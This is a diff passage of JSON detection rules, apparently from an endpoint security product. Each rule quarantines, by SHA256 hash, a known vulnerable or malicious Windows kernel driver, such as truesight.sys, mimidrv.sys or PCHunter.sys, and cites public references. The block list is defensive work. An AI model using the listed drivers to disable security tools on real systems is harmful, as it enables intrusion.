+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.986014Z",
+ "creation_date": "2026-03-23T11:45:29.986016Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.986021Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7fd90500b57f9ac959c87f713fe9ca59e669e6e1512f77fccb6a75cdc0dfee8e",
+ "comment": "Vulnerable Kernel Driver (aka mhyprot3.sys) [https://www.loldrivers.io/drivers/2aa003cd-5f36-46a6-ae3d-f5afc2c8baa3/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9ac8eaec-2709-5410-9917-ef1c7aa77968",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498938Z",
+ "creation_date": "2026-03-23T11:45:31.498941Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498957Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0814a2a3868c0b660aa4f45294a8d5b7645547a71bee2e9420e9ac54378c7130",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9ad1bdf8-2823-5118-b1dc-7564b78ae958",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982014Z",
+ "creation_date": "2026-03-23T11:45:29.982016Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982022Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1b7fb154a7b7903a3c81f12f4b094f24a3c60a6a8cffca894c67c264ab7545fa",
+ "comment": "Vulnerable Kernel Driver (aka PCHunter.sys) [https://www.loldrivers.io/drivers/a261cd64-0d04-4bf5-ad73-f3bb96bf83cf/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9ad2fe1c-ae81-5c25-b63c-92bf575c12c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155942Z",
+ "creation_date": "2026-03-23T11:45:31.155944Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155956Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3940329e2f14114ae5b6b043f736fdaf8b52a3a2926c3b5f0679815367acd20b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9ae19ee7-3f06-5bba-b0f8-d2df995da1af",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832425Z",
+ "creation_date": "2026-03-23T11:45:30.832427Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832432Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aff016b1ce411e0858adb479407aebcbb50c5355a76147465a70efb5656ab629",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9af48946-34fb-5838-a330-fc0512979faa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.986195Z",
+ "creation_date": "2026-03-23T11:45:29.986197Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.986203Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "81b772e718e40e8d1d815cb3b16690c1ebd4e0bc555933db306037cc3341537f",
+ "comment": "Vulnerable Kernel Driver (aka pchunter.sys) [https://www.loldrivers.io/drivers/73290fcb-a0d7-481e-81a5-65a9859b50f5/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9af600fd-4e30-5ca9-95b9-98b9962efe47",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985027Z",
+ "creation_date": "2026-03-23T11:45:29.985029Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985034Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bb50818a07b0eb1bd317467139b7eb4bad6cd89053fecdabfeae111689825955",
+ "comment": "Dangerous Physmem Kernel Driver (aka Dh_Kernel.Sys) [https://www.loldrivers.io/drivers/dfce8b0f-d857-4808-80ef-61273c7a4183/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9afffc8a-739f-529f-a019-88e7d8fc36cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976921Z",
+ "creation_date": "2026-03-23T11:45:29.976923Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976928Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b309ab94ce74e0611372374408cd9c83efcfbd58d1b3df2567fcb78ab245b1d3",
+ "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9b0a929f-45c8-5f8d-8424-ccd9e124eb08",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822171Z",
+ "creation_date": "2026-03-23T11:45:30.822174Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822179Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "665512fdf31d81504e6540e94d8f1b39f3e56932054a9b83aa4a45360e1c5477",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9b0c0519-a67f-57ff-995e-07f8771d9e24",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484751Z",
+ "creation_date": "2026-03-23T11:45:31.484755Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484764Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "13e38c1312d7ac8fac4e6f80c3756f8348e0c566773e290cea6dc176601d9e4d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9b0efb40-097f-5aef-9668-4ca4fd0288ef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824708Z",
+ "creation_date": "2026-03-23T11:45:31.824710Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824716Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b31a9a31a00498fb7c81761183e390e3c78180e5bcfb2573fdf95d6a628ebf5a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9b19490b-3179-54e5-b400-83c063e6dd99",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466326Z",
+ "creation_date": "2026-03-23T11:45:30.466330Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466337Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ac5fb90e88d8870cd5569e661bea98cf6b001d83ab7c65a5196ea3743146939a",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9b293db4-99c4-5363-8924-42168070f5fb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604889Z",
+ "creation_date": "2026-03-23T11:45:29.604891Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604897Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6029e838d1573bc036d8f7848e5e4671360617cd138c0e8d5f159a848e5d2782",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9b2d0f94-fb1d-5643-8661-a33fcd367338",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972772Z",
+ "creation_date": "2026-03-23T11:45:29.972774Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972779Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "605e0efa14fc8443dc43c2068f17e6f175369909d5f7f1c3730fb5fe062528e6",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9b33552b-b583-588d-971c-0a6092e3c879",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813844Z",
+ "creation_date": "2026-03-23T11:45:31.813847Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813852Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e9acd4ef31444f62847ca2d6197f807a88f2539d5cef2c6a14a6fa0b5361b5c1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9b379b83-bca4-5e5c-a02e-f9a8fdbab5d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974609Z",
+ "creation_date": "2026-03-23T11:45:29.974611Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974617Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "83a67b544982a2fd1484af752cc4ab2f6c0b50cb3c9dba60b888c2c2e37d1036",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9b39597e-e119-5e8b-a4bc-9637fc092ee5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141558Z",
+ "creation_date": "2026-03-23T11:45:31.141560Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141566Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d7f685c13c33b23791328fb4169067755632cb0ee423a3ea465514f8f7311607",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9b3a48b4-67cb-534b-b762-d0d0d39c828e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819651Z",
+ "creation_date": "2026-03-23T11:45:31.819654Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819662Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "11b37c27e8598456fa635850d96de920d93062bad509278c074e7502dc3c9b6e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9b3ee847-0a69-5ccf-ab0a-5d5b50e48a2e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814338Z",
+ "creation_date": "2026-03-23T11:45:31.814341Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814349Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a23601872001105d92f91118d89c66a3a74c723dae381b821a06357f705ad0fc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9b42451e-5d0b-5235-bfad-a3db392e14d8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479386Z",
+ "creation_date": "2026-03-23T11:45:30.479388Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479393Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7164aaff86b3b7c588fc7ae7839cc09c5c8c6ae29d1aff5325adaf5bedd7c9f5",
+ "comment": "Vulnerable Kernel Driver (aka segwindrvx64.sys) [https://www.loldrivers.io/drivers/a4aa80bc-4ecd-49ab-bc0f-0f49b07fdd7f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9b45e5e4-9065-56e6-945b-3093a25deaba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498603Z",
+ "creation_date": "2026-03-23T11:45:31.498607Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498616Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "57390caccbbacd3bc02c80508b3564166e1f8a63c2449ea54334c5ae08ca2615",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9b48cf4d-0072-51dd-9b1e-0348c584b62c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608652Z",
+ "creation_date": "2026-03-23T11:45:29.608654Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608660Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3069a07f31cb4a3fd99055cfe33b8efba08859b7d3e225060edc6631b6f44020",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9b4914a9-4e9f-5764-903f-f225c30c625b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823106Z",
+ "creation_date": "2026-03-23T11:45:31.823108Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823114Z",
+ "rule_level": null,
